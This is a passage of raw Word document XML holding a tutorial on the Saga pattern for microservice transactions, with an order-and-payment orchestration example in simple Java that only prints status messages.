        <w:t xml:space="preserve"> to be managed by coordinating the smaller transactions across multiple services. If one of the steps fails, compensation transactions are executed to roll back the changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A55EC51" w14:textId="77777777" w:rsidR="00244286"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23235DB">
          <v:rect id="_x0000_i2030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D57AC28" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286"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Key Concepts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77742E01" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1837"/>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lastRenderedPageBreak/>
        <w:t>Saga</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A sequence of local transactions where each service involved in the saga executes a transaction and updates its database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F15D466" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1837"/>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Local Transactions</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Each step of the saga is a local transaction that is executed by a single service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43822698" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1837"/>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Compensation</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If a transaction fails, compensation is required to undo the previous steps in the saga, ensuring that the system remains consistent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730F7161" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1837"/>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Choreography</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In this style, services communicate directly with each other to decide when and how to execute their transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327D801D" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1837"/>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Orchestration</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A central service (orchestrator) controls the saga and coordinates the execution of each transaction step.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A8A557" w14:textId="77777777" w:rsidR="00244286"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B48CBE0">
          <v:rect id="_x0000_i2031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DBB50D" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286"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Types of Saga Execution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BD8146" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1838"/>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Choreography-based Sagas</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B153432" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1838"/>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Services publish events (e.g., via message queues).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07802CDF" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1838"/>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Each service listens for events and reacts accordingly (executes its own local transaction).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B461E28" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1838"/>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No central coordinator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFFD8BF" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1838"/>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Orchestration-based Sagas</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112AE6AA" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1838"/>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A central orchestrator service coordinates the saga execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DFC1FA" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1838"/>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The orchestrator triggers each step of the saga and decides when to trigger compensation actions if any transaction fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642172D4" w14:textId="77777777" w:rsidR="00244286"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2C24EDB">
          <v:rect id="_x0000_i2032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="723F1524" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286"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Benefits of Saga Pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791AF605" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1839"/>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Decentralized</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Unlike a monolithic database where a single system coordinates the transaction, the saga allows each service to handle its own local transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5D060B" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1839"/>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Resilience</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In case of failure, compensation mechanisms ensure that the system can roll back or revert to a consistent state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBDA0F2" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1839"/>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Scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Enables handling large-scale, long-running distributed transactions in microservices architectures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED452A8" w14:textId="77777777" w:rsidR="00244286"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57F269">
          <v:rect id="_x0000_i2033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6273E2DA" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286"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Example of Saga (Orchestration-based):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D2ADB9"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Let’s say we are processing an order payment system across multiple microservices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375F5498" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1840"/>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Order Service</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Creates an order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3D2282" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1840"/>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Payment Service</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Processes payment for the order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4761C685" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1840"/>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Inventory Service</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Deducts inventory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D09A85F" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1840"/>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Shipping Service</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ships the product.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468D0600"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If </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Payment Service</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> fails, we need to compensate by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2BFE66" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1841"/>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Reversing the order</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Order Service</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CB6512" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1841"/>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Restoring inventory</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Inventory Service</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F15177" w14:textId="77777777" w:rsidR="00244286"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FFB9198">
          <v:rect id="_x0000_i2034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECEE13F" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286"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Java Example of Saga Orchestration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A435BB" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286"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1. OrderService: Handles order creation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AE43D6"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ublic class OrderService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6D6113"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ublic void createOrder() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22320B51"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 Create Order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E8EE2D"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System.out.println("Order created.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270626B1"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32070EF9" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53D6228C"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ublic void cancelOrder() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F8489F"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 Cancel Order if payment fails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4806EDF4"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System.out.println("Order canceled.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE37C96"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4E2F6341"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFF8983" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286"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2. PaymentService: Processes payments and triggers events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084B125A"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ublic class PaymentService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430BBD2B"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ublic void processPayment() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3464F67C"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 Process payment logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2050C10D"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        System.out.println("Payment processed.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550AC692"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1970A762" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11D21400"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ublic void cancelPayment() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4355FCB9"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 Cancel payment if needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CD0BF0"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System.out.println("Payment canceled.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594FE202"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689E4F2D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C505322" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286"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3. SagaOrchestrator: Manages the saga and calls services in sequence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5091F466"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ublic class SagaOrchestrator {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A59DDFA"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rivate OrderService orderService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A56908"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rivate PaymentService paymentService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BB2E00" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FE08486"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ublic SagaOrchestrator(OrderService orderService, PaymentService paymentService) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7348F04D"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this.orderService = orderService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5037C231"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this.paymentService = paymentService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0621B456"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560FF53F" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D405FF5"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ublic void executeSaga() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AE0D52"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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55420264"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orderService.createOrder();  // Step 1: Create order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60629CFA"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aymentService.processPayment();  // Step 2: Process payment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422D1D2E"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 Continue with further services like Inventory and Shipping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C538F0"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System.out.println("Saga completed successfully.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4426371D"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 catch (Exception e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091D2AE8"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 Compensate if any failure occurs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F03B1D1"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aymentService.cancelPayment();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC966DC"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orderService.cancelOrder();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487BC7C9"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System.out.println("Saga failed. Compensated.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAC36E5"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1CC2D6F8"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79BDB185"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D503BD1" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4. Test the Saga:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A13AE8D"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ublic class Main {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301C00CF"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ublic static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D57D7C5"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OrderService orderService = new OrderService();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFD80D9"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PaymentService paymentService = new PaymentService();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3144EE55" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C780321"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SagaOrchestrator orchestrator = new SagaOrchestrator(orderService, paymentService);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631CD111"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orchestrator.executeSaga();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638D6F56"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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F5213D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0909B0" w14:textId="77777777" w:rsidR="00244286"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10D39D4">
          <v:rect id="_x0000_i2035" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC56753" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286"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Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F19B271"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Order created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DF8A58"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Payment processed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CB1E05"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Saga completed successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4B8DAB" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00000000" w:rsidP="00FE41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704A0A">
          <v:rect id="_x0000_i2036" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1986A986" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> When to Use Saga Pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E222955" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1842"/>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Distributed Transactions</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When a long-running transaction spans multiple microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F988FCC" w14:textId="77777777" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
